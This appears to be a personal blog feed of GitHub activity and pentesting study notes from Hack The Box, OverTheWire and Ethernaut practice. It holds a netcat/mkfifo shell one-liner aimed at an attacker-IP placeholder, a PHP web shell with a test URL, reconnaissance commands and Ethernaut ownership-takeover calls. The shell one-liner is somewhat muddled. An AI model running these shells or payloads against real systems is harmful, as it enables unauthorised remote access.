• • October 13, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 13, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 12, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 11, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 10, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 9, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 8, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 8, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 7, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 6, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 6, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 5, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 3, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 1, 2024

  I disliked some of my notes yesterday regarding reverse shells on a target machine.

  I hope these notes are more clear, as getting a shell on an attacking box is a critical skill.

  On the target machine we can run a bash command like:

  rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l {ip attacking box} {attacking port} > /tmp/f
  

  And on our host machine we can listen for the pipe, (the ip address and port number will the same)

  nc -nv {ip attacking box} {some port}
  

  • commit was made to main in the tim-s-gatsby-app repo
  Check it out on Github
• • October 1, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • October 1, 2024

  I was able to finish hackthebox's Academy, which is 28 modules and about 2 months worth of videos, trainings, and questions in real life hacking scenarios.

  Some of the commands I found myself using were:

  Adding to the hosts file. The /etc/hosts file is used to resolve a hostname into an ip address.

  echo "{target_ip} ignition.htb" | sudo tee -a /etc/hosts
  

  Nmap, this command with the flag --min-rate specifies the number of packets that nmap should send per second, the higher the number the faster the scan.

  nmap -p- --min-rate=1000 -sV {target_ip}
  

  Nmap with script scanning and version detection, one of the more intrusive nmap scans, with a high probability of being caught. It produces attractive and verbose output. Use as a first scan if unconcerned with detection.

  sudo nmap -sC -sV {target_ip}
  

  Gobuster brute-force web-app directory structure

  sudo gobuster dir -w /usr/share/wordlists/common.txt -u {target ip}
  

  A wordlist for gobuster brute force attacks:

  git clone https://github.com/danielmiessler/SecLists.git
  

  RDP into a windows host:

  xfreerdp /v:{target ip} /u:Administrator
  

  List SMB shares

  smbclient -L {target ip}
  

  Login to SMB share:

  smbclient \\\\{target ip}\\share
  

  PHP, if we can upload the following php file to a web-app

  <?php system($_GET["cmd"]); ?>
  

  And if the web-app responds with the output of the OS command id,

  http://{ip address or dns name}/shell.php?cmd=id
  

  Then we know we can upload a reverse shell via the web-app.

  • commit was made to main in the tim-s-gatsby-app repo
  Check it out on Github
• • September 25, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 19, 2024

  Today I pushed some notes from my work on https://academy.hackthebox.com/. I've been diving deeper into cybersecurity and found their educational material to be excellent. My goal is to get certified on their CPTS, certified pentesting specialist exam, which I am preparing for now. I'm going to use Hack The Box's educational material to sharpen my skills and take a shot at Offensive Security's OSCP certification, which seems to be the standard in the industry for early professionals in cybersecurity.

  A few tools I find myself using:

  nmap -sV [ip address]

  I use nmap for port sniffing, and reconnaissance to surveil a target. Nmap has a large number of flags and options, but the -sV flag gets the service and version running on open ports.

  The metasploit framework offers a command line interface (as well as GUI) that has a library of vulnerabilites to attack a target.

  If we get the right information from our recon, and there is a vulnerability on that version of machine or service, we can attack it directly.

  Gobuster is a command line tool used for brute forcing directories, subdomains, and vhosts. It uses a wordlist to attempt to find the directory structure of a web app.

  Hydra is a command line tool we can use to brute force ssh.

  • commit was made to main in the tim-s-gatsby-app repo
  Check it out on Github
• • September 19, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 13, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 13, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 13, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 2, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 2, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 1, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 1, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 1, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 1, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 1, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 1, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • September 1, 2024
  • OverTheWire - Pentesting Notes

  Shook the rust off of Visual Studio Code and was surprised to find a well documented directory w/ Dockerfile and docker-compose file running kali linux with a dozen or so shell scripts for a wargame called Bandit.

  The wargame is from a webapp called OverTheWire which offers free wargames to practice pentesting skills, link here -> https://overthewire.org/wargames/bandit/

  Each level of the Bandit wargame has you break into a linux virtual machine, the previous level's task guides you to a password, which you need to login to the next level's virtual machine.

  This summer I took some classes in Calculus and Physics and this was a good way stretching out my command line and scripting skills for upcoming interviews.

  A summary of some of the commands I used:

  • sshpass - automates the process of ssh into a VM, allows you to run commands upon logging in
  • grep - searches plaintext
  • find - directory search, using syntax, filesize, expressive options
  • 2>/dev/null - when you want to throw away garbage
  • cut - extracts text from each line of a file
  • sort - sorts lines from a textfile
  • uniq - fed lines from standard input or a file, outputs only unique text
  • strings - extract strings from a binary file
  • base64 - and encoder and decoder, to help transmit data over a network w/o running into errors
  • tr - traslates or deletes characters, useful if you want implement ROT13 or the Caesar cipher
  • mktemp - creates temporary folder/file
  • xxd - hexdump or the reverse
  • gzip - compression tool, header is \x1F\x8B\x08
  • bzip2 - compression tool, header is 425a, the next byte gives the version
  • tar - compress to/from archive
  • scp - copy files

  The code can be found here -> https://github.com/trmchale1/hacking

  • commit was made to main in the tim-s-gatsby-app repo
  Check it out on Github
• • August 31, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • August 31, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • August 31, 2024
  • push was made to main in the hacking repo
  Check it out on Github
• • March 24, 2024
  • git reset --hard

  Today I ran a command I would use rarely, and if it were in a workplace environment, would actually be a pretty big deal.

  git reset --hard 6894f6e1...

  Like an artist, you have to look at your work and realize that some of it is utter junk and needs to be thrown out. Bad code smells.

  It smells like 1000+ lines of code changes, with changes to configs that indicate potential dependency conflicts.

  In this case I wanted to integrate RainbowKit to my personal website timmchale.co, the css in this new download clashed with my current css and postprocessing.

  I spent several days debugging dependency issues and deleting core functionality of the Gatsby app that I started with.

  Now I am realizing I built my web-app with Gatsby, which was fine for a one page app with simple html like functionality, but I need to go with Next.js for improved routing functionality.

  Keeping code small, with simple workflows consistently works for me. Any time I put too much functionality together, things tend to break.

  I used git reset because I wanted to change where the HEAD was pointing at, this command alters previous history, going back in time, so to speak.

  I felt I needed to use reset because the branch I started the dev work in had already been merged with a long history into the main branch. And I wanted that history removed as well.

  In most cases when correcting the mistake of just one commit, you want to use the git revert command, github's user interface has a good revert feature in the pull request tab.

  • commit was made to main in the tim-s-gatsby-app repo
  Check it out on Github
• • March 24, 2024
  • force_push was made to master in the tim-s-gatsby-app repo
  Check it out on Github
• • March 23, 2024
  • pr_merge was made to master in the tim-s-gatsby-app repo
  Check it out on Github
• • March 21, 2024
  • branch_creation was made to rainbowkit-manual-integration in the tim-s-gatsby-app repo
  Check it out on Github
• • March 18, 2024
  • pr_merge was made to master in the tim-s-gatsby-app repo
  Check it out on Github
• • March 18, 2024
  • pr_merge was made to master in the tim-s-gatsby-app repo
  Check it out on Github
• • March 18, 2024
  • branch_creation was made to merge-rainbow-kit-react-app in the tim-s-gatsby-app repo
  Check it out on Github
• • March 4, 2024
  • timmchale.co is now live

  This is a link to the first release of timmchale.co

  https://github.com/trmchale1/tim-s-gatsby-app/releases/tag/v1.0.0

  This is a link to my website

  timchale.co

  • commit was made to main in the tim-s-gatsby-app repo
  Check it out on Github
• • February 21, 2024
  • Smart Contract Audit Ethernaut: Fallout

  The constructor has incorrect syntax and is misspelled, you can call it as a function and change the ownership of the contract:

  contract.Fal1out()

  • commit was made to main in the tim-s-gatsby-app repo
  Check it out on Github
• • February 20, 2024
  • Smart Contract Audit Ethernaut: Fallback

  Smart Contract Audit Ethernaut: Fallback

  In this game the player must become the owner, then withdraw the full amount from the contract.

  The key part is the receive() function, if the contract recieves a value greater than 0 and contributions of the sender are also greater than zero, then the sender becomes the owner.

  We send some small sum to the player:

  await contract.contribute.sendTransaction({ from: player, value: toWei('0.0009')})

  We send a small sum to the contract:

  await sendTransaction({from: player, to: contract.address, value: toWei('0.000001')})

  Check we own the contract:

  await contract.owner()

  Then withdraw the loot:

  await contract.withdraw()

  • commit was made to main in the tim-s-gatsby-app repo
  Check it out on Github

Loading...